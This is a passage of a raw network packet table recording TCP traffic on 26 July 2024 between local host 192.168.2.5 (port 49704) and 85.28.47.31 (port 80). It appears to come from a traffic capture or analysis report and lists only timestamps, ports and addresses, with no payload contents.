Jul 26, 2024 17:56:12.811681032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.811708927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.811708927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.811760902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.811820984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.811866045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.811876059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.811908960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.811923027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.811943054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.811953068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.811980009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.811992884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812011957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.812026978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812045097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.812061071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812077045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.812092066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812109947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.812120914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812159061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812159061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.812191963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.812207937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812225103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.812237978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812261105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.812275887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812293053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.812309980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812325001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.812339067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812356949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.812372923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812388897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.812400103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812421083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.812436104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812453985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.812468052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812500954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812520027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.812555075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.812566042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812588930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.812604904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812624931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.812640905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.812669992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.816044092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.816080093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.816111088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.816117048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.816144943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.816144943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.816168070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.816179037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.816193104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.816215038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.816221952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.816257954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.817384958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.817416906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.817445993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.817451000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.817461967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.817482948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.817495108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.817516088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.817526102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.817548990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.817558050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.817581892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.817595005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.817615032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.817625999 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.817648888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.817661047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.817681074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.817694902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.817713976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.817732096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.817747116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.817754984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.817780018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.817791939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.817811966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.817822933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.817847013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.817857981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.817882061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.817893028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.817915916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.817928076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.817950964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.817960024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.818001032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821147919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821182966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821213961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821214914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821238995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821259975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821268082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821316957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821327925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821400881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821413994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821433067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821450949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821461916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821474075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821495056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821506977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821531057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821546078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821559906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821583033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821592093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821603060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821624994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821638107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821657896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821687937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821690083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821707964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821722984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821727037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821755886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821768045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821788073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821796894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821820974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821830988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821863890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821866035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821897984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821909904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821930885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821943045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.821974039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.821985006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.822007895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.822020054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.822041035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.822052956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.822072983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.822086096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.822105885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.822120905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.822138071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.822149992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.822170973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.822180986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.822202921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.822215080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.822236061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.822247982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.822268009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.822279930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.822300911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.822312117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.822333097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.822348118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.822365999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.822379112 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.822397947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.822411060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.822431087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.822444916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.822463989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.822474003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.822499037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.822508097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.822527885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.822546005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.822570086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.826838017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.826870918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.826905012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.826906919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.826930046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.826939106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.826950073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.826972008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.826983929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.827003956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.827013016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.827037096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.827048063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.827070951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.827080011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.827111959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.890047073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.890081882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.890121937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.890156031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.890423059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.890475988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.890547991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.890582085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.890604973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.890614986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.890629053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.890647888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.890660048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.890680075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.890691042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.890714884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.890726089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.890749931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.890762091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.890801907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.891344070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.891379118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.891401052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.891419888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.894773960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.894845009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.894882917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.894916058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.894929886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.894962072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.895050049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.895103931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.895195007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.895236969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.895247936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.895283937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.895380974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.895435095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.895545006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.895575047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.895603895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.895617008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.895663977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.895697117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.895714045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.895730019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.895741940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.895764112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.895776033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.895812988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.896023035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.896078110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.896197081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.896255016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.896301031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.896332979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.896362066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.896384954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.896461010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.896512985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.896586895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.896621943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.896640062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.896662951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.896886110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.896919966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.896943092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.896954060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.896965027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.896989107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.897001982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.897036076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.897388935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.897422075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.897447109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.897454977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.897466898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.897486925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.897501945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.897520065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.897528887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.897552967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.897567987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.897594929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.897886992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.897918940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.897941113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.897952080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.897958994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.897985935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.897994041 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.898020029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.898026943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.898066044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.909375906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.909415960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.909449100 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.909449100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.909477949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.909485102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.909492970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.909524918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.910048008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.910080910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.910104036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.910113096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.910124063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.910146952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.910154104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.910178900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.910186052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.910211086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.910218000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.910252094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.912873983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.912906885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.912930012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.912949085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.912955999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.912988901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.912997961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.913022041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.913028955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.913053989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.913059950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.913086891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.913094997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.913120031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.913127899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.913151979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.913156986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.913183928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.913198948 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.913217068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.913224936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.913250923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.913259983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:12.913284063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:12.913290977 CEST	49704	80	192.168.2.5	85.28.47.31
